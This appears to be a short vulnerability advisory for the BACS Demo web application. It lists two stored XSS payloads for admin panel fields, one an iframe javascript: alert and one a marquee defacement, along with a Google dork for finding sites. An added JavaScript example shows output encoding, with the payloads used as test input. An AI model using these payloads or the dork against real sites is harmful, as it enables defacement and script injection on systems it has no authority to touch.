BACS Demo suffers from a persistent cross-site scripting vulnerability.
BACS DEMO persistent XSS vulnerabilities
vendor: www.bacsdemo.com
Author: Karthik R (3psil0nLambDa)
Email: Karthik.cupid@gmail.com
My blog: epsilonlambda.co.cc
Google dork: Copyright © 2009 Coupon codes
Exploits:
Persistent XSS vulnerability in the admin panel->static page->add new section. In HTML mode, type the following string:
"><iframe src="javascript:alert('XSS');"></iframe>
Click update. A JavaScript alert box pops up \m/
Persistent XSS vulnerability in admin panel->tags->manage tags and also in the add new tag field section. In the search box, type the following string:
"><marquee><h1>Hacker</h1></marquee>
The webpage is defaced with the marquee rendered on the screen. \m/
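Both strings above start with "> and so close a quoted attribute before opening new elements. The following is an added example, not code from BACS Demo or from the advisory's author: it contrasts a template that concatenates a stored value into an attribute with the same template using output encoding, and checks which elements end up in the markup. The field name, template and function names are hypothetical, and the attribute context is an assumption drawn from the shape of the strings.

```javascript
// Added example: field names and templates are hypothetical, not BACS Demo code.

// Encode the five characters that can change HTML parsing context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: stored value concatenated into a quoted attribute.
function renderTagFieldUnsafe(stored) {
  return '<input type="text" name="tag" value="' + stored + '">';
}

// Hardened pattern: same template, value encoded at output time.
function renderTagFieldSafe(stored) {
  return '<input type="text" name="tag" value="' + escapeHtml(stored) + '">';
}

// Regression check: list the element names opened in the markup.
// A simple regex over opening tags is adequate for these fixed templates.
function openedElements(html) {
  const names = [];
  const re = /<([a-zA-Z][a-zA-Z0-9]*)\b/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// The two strings from the advisory, used as stored test input.
const SAMPLES = [
  '"><iframe src="javascript:alert(\'XSS\');"></iframe>',
  '"><marquee><h1>Hacker</h1></marquee>',
];

// For each sample, compare the elements produced by both templates.
function report() {
  return SAMPLES.map((s) => ({
    unsafe: openedElements(renderTagFieldUnsafe(s)),
    safe: openedElements(renderTagFieldSafe(s)),
  }));
}

console.log(JSON.stringify(report(), null, 2));
```

With encoding applied, the stored value stays inside the value attribute and only the input element is present.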
-------------------------------------------------------------------------------------------
Tribute to side^effects and love to taashu.
-------------------------------------------------------------------------------------------